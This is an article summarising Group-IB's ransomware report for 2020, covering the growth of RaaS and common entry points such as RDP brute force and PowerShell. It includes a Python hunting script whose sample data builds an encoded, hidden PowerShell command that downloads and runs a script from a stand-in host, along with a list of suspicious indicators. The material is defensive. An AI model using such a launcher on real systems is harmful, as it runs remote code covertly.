2020 was a difficult year for most people around the globe. It brought unprecedented hardship, and for many the situation went beyond merely living hand-to-mouth. One set of individuals, however, had the time of their lives: the ransomware operators. While industries and businesses struggled to adapt to pandemic reality, threat actors thrived, attacking bigger targets and demanding more money. 2020 saw the growth of Ransomware-as-a-Service (RaaS) programs, which became increasingly popular on underground forums. The data exfiltration tactic employed by operators gave them added assurance of a payout, and so it became a popular choice among their peers. To stand a chance against threat actors in 2021, it is vital not only to understand their TTPs, but also to know what actions to take against them. Along these lines, the cybersecurity firm Group-IB has released a report titled “Ransomware Uncovered 2020-2021.”
The Growth of Ransomware Report
The report dives deep into the global ransomware outbreak in 2020 and analyzes the major players’ TTPs (tactics, techniques, and procedures). By the end of 2020, the ransomware market, fueled by the pandemic turbulence, had turned into the biggest money-making business in cybercrime. Based on the analysis of more than 500 observed attacks, researchers estimate that the number of ransomware attacks grew by more than 150% in 2020.
In 2020, ransomware attacks caused an average of 18 days of downtime for the affected companies, while the average ransom demand doubled to $170,000. Ransomware operations have become robust, competitive business structures going after larger enterprises for better returns. Among the most active ransomware gangs, researchers found Maze, Conti, and Egregor at the forefront in the past year. Maze, DoppelPaymer, and RagnarLocker were termed the greediest groups, with ransom demands averaging between $1 million and $2 million.
Analyzing the geo-targets of the ransomware gangs, researchers spotted that the most attacked regions in the world were North America, Europe, Latin America, and the Asia-Pacific.
On a technical level, public-facing RDP servers were the most common entry point for ransomware gangs last year. The pandemic pushed many people to work from home, and the number of such servers grew sharply. In 52% of all attacks analyzed by Group-IB researchers, publicly accessible RDP servers were used to gain initial access, followed by phishing (29%) and exploitation of public-facing applications (17%). In the credential access stage, threat actors often brute-forced passwords, with NLBrute and Hydra being the most popular tools. To obtain valid accounts with higher privileges, ransomware operators in 2020 often used credential dumping, extracting stored credentials and password hashes from the compromised machine.
PowerShell was the most frequently abused interpreter for launching the initial payload. Its popularity among attackers is explained by the fact that the interpreter ships with every modern Windows system, so malicious use blends in with legitimate administrative activity.
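The two footholds described above, brute-forced RDP logons and PowerShell-launched payloads, are also the two easiest to hunt for in standard Windows telemetry. The following Python is an added example written for this page, not code from Group-IB or the report: it runs a simple RDP brute-force detector over constructed Windows Security events (4625 failed logon, 4624 successful logon, logon type 10 for RemoteInteractive/RDP) and decodes a PowerShell `-EncodedCommand` argument (base64 of UTF-16LE) to score the command line. The event records, command lines, threshold and time window are all constructed assumptions, not real telemetry.

```python
"""Added hunting example for brute-forced RDP logons and encoded PowerShell
launchers. All events and command lines below are constructed sample data."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# --- RDP brute force ------------------------------------------------------
# Windows Security log: 4625 = failed logon, 4624 = successful logon.
# LogonType 10 (RemoteInteractive) is what an RDP session produces.
RDP_LOGON_TYPE = 10


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """Return {source_ip: summary} for IPs with `threshold` or more failed RDP
    logons inside `window`, noting whether a successful logon followed.
    Threshold and window are assumed values; tune them to your environment."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["LogonType"] == RDP_LOGON_TYPE:
            by_ip[ev["IpAddress"]].append(ev)
    hits = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        failures = [e for e in evs if e["EventID"] == 4625]
        for i in range(len(failures)):
            # Grow a window starting at failure i while it stays within `window`.
            j = i
            while (j + 1 < len(failures)
                   and failures[j + 1]["TimeCreated"] - failures[i]["TimeCreated"] <= window):
                j += 1
            if j - i + 1 >= threshold:
                last = failures[j]["TimeCreated"]
                # A 4624 from the same IP after the burst means the spray succeeded.
                success = next((e for e in evs
                                if e["EventID"] == 4624 and e["TimeCreated"] >= last), None)
                hits[ip] = {
                    "failures": j - i + 1,
                    "accounts": sorted({e["TargetUserName"] for e in failures[i:j + 1]}),
                    "compromised": success["TargetUserName"] if success else None,
                }
                break
    return hits


# --- PowerShell launcher --------------------------------------------------
# -e, -ec, -enc and -EncodedCommand all accept base64(UTF-16LE) script text.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "frombase64string", "new-object net.webclient", "-nop",
              "-w hidden", "-windowstyle hidden", "-ep bypass")


def encode_command(script):
    """Produce the form PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_powershell(cmdline):
    """Return (decoded_script_or_None, sorted list of matched indicators)."""
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + " " + (decoded or "")).lower()
    indicators = [s for s in SUSPICIOUS if s in text]
    if decoded is not None:
        indicators.append("encodedcommand")
    return decoded, sorted(indicators)


# --- Constructed sample data ----------------------------------------------
BASE = datetime(2020, 11, 3, 2, 14)


def _ev(event_id, minute, ip, user, logon_type=RDP_LOGON_TYPE):
    return {"EventID": event_id, "TimeCreated": BASE + timedelta(minutes=minute),
            "IpAddress": ip, "TargetUserName": user, "LogonType": logon_type}


SAMPLE_EVENTS = (
    # Password spray over six minutes, then a success: should be flagged.
    [_ev(4625, m, "203.0.113.7", u) for m, u in enumerate(
        ["administrator", "admin", "backup", "administrator", "admin", "itadmin"])]
    + [_ev(4624, 7, "203.0.113.7", "itadmin")]
    # One typo then success from a real user: should not be flagged.
    + [_ev(4625, 1, "198.51.100.20", "jdoe"), _ev(4624, 2, "198.51.100.20", "jdoe")]
    # Network (type 3) failures are a different detector, ignored here.
    + [_ev(4625, m, "203.0.113.9", "svc", logon_type=3) for m in range(8)]
)
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_command(PAYLOAD)

if __name__ == "__main__":
    print(detect_rdp_bruteforce(SAMPLE_EVENTS))
    print(score_powershell(SAMPLE_CMDLINE))
```

On real data, feed the RDP detector 4625/4624 events from the Security log and the PowerShell scorer 4688 (or Sysmon event 1) command lines; the string indicators are deliberately crude and serve to rank command lines for review rather than to block them.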
The Rise of RaaS
The Ransomware-as-a-Service (RaaS) model has largely been the driving force behind the sensational growth of ransomware attacks. Under this model, the developers sell or lease the malware to program affiliates, who handle network compromise and ransomware deployment. Profits are then shared between the operators and the affiliates. Against this backdrop, Group-IB researchers observed that 64% of all ransomware attacks analyzed in 2020 came from operators using the RaaS model.
Oleg Skulkin, Senior Digital Forensics Analyst at Group-IB, said, “The pandemic has catapulted ransomware into the threat landscape of every organization and has made it the face of cybercrime in 2020. From what used to be a rare practice and an end-user concern, ransomware evolved last year into an organized multi-billion industry with competition within, market leaders, strategic alliances, and various business models. This successful venture is only going to get bigger from here. Due to their profitability, the number of RaaS programs will keep growing, and more cybercriminals will focus on gaining access to networks for resale purposes.
Given that most attacks are human-operated, it is paramount for organizations to understand how attackers operate and what tools they use, to be able to counter ransomware operators’ attacks and hunt for them proactively. It is everyone’s concern now.”